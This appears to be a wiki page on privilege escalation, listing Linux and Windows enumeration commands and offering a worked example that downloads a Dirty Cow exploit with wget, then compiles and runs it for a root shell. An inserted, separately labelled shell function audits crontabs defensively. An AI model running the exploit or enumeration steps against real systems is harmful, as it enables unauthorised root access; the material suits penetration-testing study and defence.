Privilege Escalation: Difference between revisions

From HackOps



Revision as of 18:07, 30 May 2025

Privilege Escalation

Privilege escalation is the process of gaining higher-level permissions or access within a system after an initial foothold has been established. It plays a critical role in post-exploitation, allowing an attacker to move from a limited user account to administrative or root-level access — often enabling lateral movement, persistence, or full system compromise.

Privilege escalation is typically divided into two categories: *vertical escalation* (gaining higher privileges) and *horizontal escalation* (gaining access to resources or accounts of equal privilege).

Privilege escalation is rarely a one-step action — it follows a structured process:

  • Collect – Perform thorough enumeration across the system.
  • Process – Organize and analyze the data to identify promising leads.
  • Search – Identify known vulnerabilities and locate suitable exploit code.
  • Adapt – Customize the exploit to match the specific environment.
  • Try – Execute and iterate; exploitation often requires trial and error.


Operational Context

Privilege escalation typically follows successful Initial Access, especially when the initial compromise grants access only to limited user accounts.

This phase is crucial for:

  • Achieving administrative control (root, SYSTEM)
  • Enabling credential extraction and lateral movement
  • Bypassing sandboxed or containerized environments
  • Establishing persistence mechanisms (e.g., registry, startup tasks)

Vertical Privilege Escalation

Vertical escalation involves moving from a low-privileged account (e.g., www-data, local user) to a higher-privileged one (e.g., Administrator, SYSTEM, or root).

Common Techniques

  • Exploiting kernel or driver vulnerabilities
  • Abusing misconfigured SUID/SGID binaries (Linux)
  • Misusing weak or world-writable service files
  • Leveraging unquoted service paths (Windows)
  • DLL hijacking or service misconfiguration
  • Stealing credentials from memory or config files
  • Abusing scheduled tasks or cron jobs
  • Exploiting insecure file permissions or ownership
  • Leveraging token impersonation or privilege tokens (Windows)
  • Dumping and cracking password hashes
  • Abusing Linux capabilities (e.g., cap_sys_admin)
  • Escaping weakly isolated Docker or LXC containers
  • Exploiting insecure ACLs or lack of integrity controls

Tools

Automated Exploitation Frameworks

Horizontal Privilege Escalation

Horizontal escalation involves accessing other accounts, sessions, or resources at the same privilege level, typically through impersonation, session hijacking, or misconfigured file access.

Common Techniques

  • Reading other users’ sensitive files due to improper permissions
  • Accessing SSH keys, config files, or tokens
  • Hijacking user sessions (e.g., TTY snooping or credential reuse)
  • Exploiting insecure file-sharing configurations (e.g., SMB shares)
  • Abuse of API tokens or database credentials found in cleartext

Tools

Enumeration Checklists

Linux Enumeration Commands

Purpose | Command | Potential Use in Privilege Escalation
SUID/SGID binaries | find / -perm -4000 2>/dev/null | May reveal misconfigured binaries that can be exploited for privilege escalation.
Kernel version | uname -a | Identifying vulnerable kernel versions that have known local privilege escalation exploits.
Environment variables | env | May expose sensitive paths or misconfigured variables usable in custom script execution.
Running processes | ps aux | Reveals services or scripts running as root; useful for process injection or misconfigurations.
Installed packages (Debian) | dpkg -l | Can identify vulnerable software versions or unintended package installs.
Installed packages (Red Hat) | rpm -qa | Same as above, but for RPM-based systems.
Writable directories | find / -writable 2>/dev/null | Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs.
Cron jobs | cat /etc/crontab | Look for jobs running as root or referencing writable scripts.
User info | cat /etc/passwd | Useful for identifying users, shell access, and potential privilege chaining.
Group info | cat /etc/group | Can show membership in sensitive groups like `sudo`, `docker`, or `adm`.
OS version info (Generic) | cat /etc/issue | Helps fingerprint the system for targeted exploits.
OS version info (All common release files) | cat /etc/*-release | Same purpose: confirms distro and version for exploit matching.
OS version (Debian based) | cat /etc/lsb-release | Specifically useful for identifying Ubuntu/Debian versions.
OS version (Red Hat based) | cat /etc/redhat-release | Same, but for RHEL/CentOS systems.
Kernel version & architecture | see the command list below | Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture.

Kernel version & architecture commands:
  cat /proc/version          # Shows detailed kernel version and build info
  uname -a                   # Displays all system info including kernel name and architecture
  uname -mrs                 # Prints kernel name, version, and hardware name
  rpm -q kernel              # Lists installed kernel packages (RPM-based systems)
  dmesg | grep Linux         # Extracts kernel-related boot messages
  ls /boot | grep vmlinuz-   # Lists available kernel images in /boot
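The "Cron jobs" and "Writable directories" rows above describe one finding that is worth checking from the defender's side as well. As an added example (not code from the HackOps page), the POSIX sh function below parses a system crontab and flags root jobs whose command file is group- or world-writable; the function names, the sample scripts and the sample crontab built in a temporary directory are this example's own constructed data, so it runs offline without touching /etc/crontab.

```shell
# Added example (not from the HackOps page): audit a system crontab for root jobs whose
# command file is group- or world-writable, the pairing of the "Cron jobs" and "Writable
# directories" checks in the Linux enumeration table above.
# Usage: find_writable_root_cron_scripts /etc/crontab
# Prints one line per root job whose command is a writable absolute path;
# returns 0 when nothing is found, 1 when at least one finding was printed.
find_writable_root_cron_scripts() {
    crontab="$1"
    found=0
    set -f                              # cron fields contain '*': disable globbing
    while IFS= read -r line; do
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac   # blank, comment, VAR=value
        set -- $line
        # system crontab: "m h dom mon dow user command" or "@reboot user command"
        case "$1" in
            @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;
            *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;
        esac
        [ "$user" = root ] || continue
        script=$1; cmd="$*"
        case "$script" in /*) ;; *) continue ;; esac   # only absolute paths are checked
        [ -f "$script" ] || continue
        # columns 6 and 9 of "ls -l" output are the group and other write bits
        perms=$(ls -ldL "$script" | cut -c1-10)
        case "$perms" in
            ?????w????|????????w?)
                printf 'WRITABLE root cron script: %s (job: %s)\n' "$script" "$cmd"
                found=1 ;;
        esac
    done < "$crontab"
    set +f
    return "$found"
}
# Constructed sample data in a temp directory: one world-writable script, one
# protected script, and a crontab that references them as root and as www-data.
make_sample_crontab() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"; chmod 777 "$dir/backup.sh"
    printf '#!/bin/sh\necho rotate\n' > "$dir/rotate.sh"; chmod 755 "$dir/rotate.sh"
    cat > "$dir/crontab" <<EOF
SHELL=/bin/sh
0 2 * * * root $dir/backup.sh --full
0 3 * * * root $dir/rotate.sh
@reboot   root $dir/backup.sh --quick
*/5 * * * * www-data $dir/backup.sh
EOF
    printf '%s\n' "$dir/crontab"
}
find_writable_root_cron_scripts "$(make_sample_crontab)" || echo "fix: chmod go-w the flagged scripts"
```

On a real host, point the function at /etc/crontab (and each file under /etc/cron.d); it reports only the first command token, so wrapper invocations such as run-parts need a manual look.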

Windows Enumeration Commands

Purpose | Command
Whoami and privileges | whoami /priv
Local groups | net localgroup administrators
Services (CMD) | sc query
Services (PowerShell) | Get-Service
Startup registry keys | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks | schtasks /query
Installed programs | wmic product get name
Environment variables | set
File permissions (CMD) | icacls
File permissions (Sysinternals) | accesschk

Example: Local Kernel Exploit (Linux)

# Download and compile local privilege escalation exploit (example: Dirty Cow variant)
wget https://www.exploit-db.com/download/40839 -O exploit.c
gcc exploit.c -o exploit
./exploit

# Output: spawns root shell if successful

Websites & References

See Also